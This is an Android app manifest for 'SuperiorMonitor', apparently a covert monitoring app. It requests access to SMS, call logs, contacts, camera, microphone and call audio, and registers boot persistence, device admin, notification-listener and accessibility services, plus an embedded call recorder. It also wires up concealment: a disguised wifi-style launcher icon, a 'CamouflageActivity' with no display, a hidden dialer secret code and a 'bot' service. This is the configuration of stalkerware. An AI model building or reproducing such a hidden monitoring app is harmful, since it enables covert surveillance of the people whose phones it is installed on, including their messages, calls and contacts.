<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools">

    <queries>
        <package android:name="com.whatsapp" />
    </queries>

    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE" />
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_DATA_SYNC" />
    <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS" />
    <uses-permission android:name="android.permission.SCHEDULE_EXACT_ALARM" />
    <uses-permission
        android:name="android.permission.WRITE_SETTINGS"
        tools:ignore="ProtectedPermissions" />
    <uses-permission android:name="android.permission.READ_CALL_LOG" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <uses-permission android:name="android.permission.CAMERA" />
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.RECORD_AUDIO" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_MICROPHONE" />
    <uses-permission
        android:name="android.permission.CAPTURE_AUDIO_OUTPUT"
        tools:ignore="ProtectedPermissions" />
    <uses-permission
        android:name="android.permission.CONTROL_INCALL_EXPERIENCE"
        tools:ignore="ProtectedPermissions" />
    <application
        android:name=".SuperiorMonitorApp"
        android:allowBackup="true"
        android:dataExtractionRules="@xml/data_extraction_rules"
        android:fullBackupContent="@xml/backup_rules"
        android:icon="@mipmap/ic_wifi_launcher"
        android:label="@string/app_name"
        android:roundIcon="@mipmap/ic_wifi_launcher"
        android:supportsRtl="true"
        android:windowSoftInputMode="adjustResize"
        android:defaultToDeviceProtectedStorage="true"
        android:theme="@style/Theme.SuperiorMonitor">
        <activity
            android:name=".MainActivity"
            android:exported="true">
        </activity>

        <activity-alias
            android:name=".MainActivityLauncher"
            android:targetActivity=".MainActivity"
            android:exported="true"
            android:enabled="true"
            android:label="@string/app_name_real"
            android:icon="@mipmap/ic_launcher">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity-alias>

        <activity
            android:name=".ui.CamouflageActivity"
            android:enabled="false"
            android:exported="true"
            android:theme="@android:style/Theme.NoDisplay">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <activity
            android:name=".ui.PopupActivity"
            android:exported="false"
            android:theme="@android:style/Theme.Translucent.NoTitleBar"
            android:excludeFromRecents="true"
            android:taskAffinity="" />


        <service
            android:name=".bot.BotService"
            android:enabled="true"
            android:exported="false"
            android:foregroundServiceType="dataSync" />

        <receiver
            android:name=".receiver.BootReceiver"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>

        <receiver
            android:name=".monitor.SnapshotReceiver"
            android:enabled="true"
            android:exported="false" />

        <receiver
            android:name=".receiver.DialerCodeReceiver"
            android:exported="true">
            <intent-filter>
                <action android:name="android.telephony.action.SECRET_CODE" />
                <data android:scheme="android_secret_code" android:host="677" />
            </intent-filter>
        </receiver>

        <receiver
            android:name=".receiver.RecordingReceiver"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action android:name="com.system.superiormonitor.ACTION_NEW_RECORDING" />
            </intent-filter>
        </receiver>

        <receiver
            android:name=".receiver.MonitorDeviceAdminReceiver"
            android:permission="android.permission.BIND_DEVICE_ADMIN"
            android:exported="true">
            <meta-data
                android:name="android.app.device_admin"
                android:resource="@xml/device_admin" />
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>

        <service
            android:name=".service.MonitorNotificationListenerService"
            android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE"
            android:exported="true">
            <intent-filter>
                <action android:name="android.service.notification.NotificationListenerService" />
            </intent-filter>
        </service>

        <service
            android:name=".service.MonitorAccessibilityService"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"
            android:exported="true">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService" />
            </intent-filter>
            <meta-data
                android:name="android.accessibilityservice"
                android:resource="@xml/accessibility_service_config" />
        </service>
        <service
            android:name="com.chiller3.bcr.NotificationActionService"
            android:exported="false" />

        <receiver
            android:name="com.chiller3.bcr.DirectBootMigrationReceiver"
            android:exported="false">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>

        <service
            android:name="com.chiller3.bcr.DirectBootMigrationService"
            android:exported="false" />

        <service
            android:name="com.chiller3.bcr.RecorderInCallService"
            android:exported="true"
            android:foregroundServiceType="microphone"
            android:directBootAware="true"
            android:permission="android.permission.BIND_INCALL_SERVICE">
            <meta-data
                android:name="android.telecom.IN_CALL_SERVICE_UI"
                android:value="false" />
            <meta-data
                android:name="android.telecom.INCLUDE_EXTERNAL_CALLS"
                android:value="true" />
            <meta-data
                android:name="android.telecom.INCLUDE_SELF_MANAGED_CALLS"
                android:value="true" />
            <intent-filter>
                <action android:name="android.telecom.InCallService" />
            </intent-filter>
        </service>

        <provider
            android:authorities="com.system.superiormonitor.bcr.provider"
            android:name="com.chiller3.bcr.RecorderProvider"
            android:exported="false"
            android:grantUriPermissions="true">
        </provider>

    </application>

</manifest>
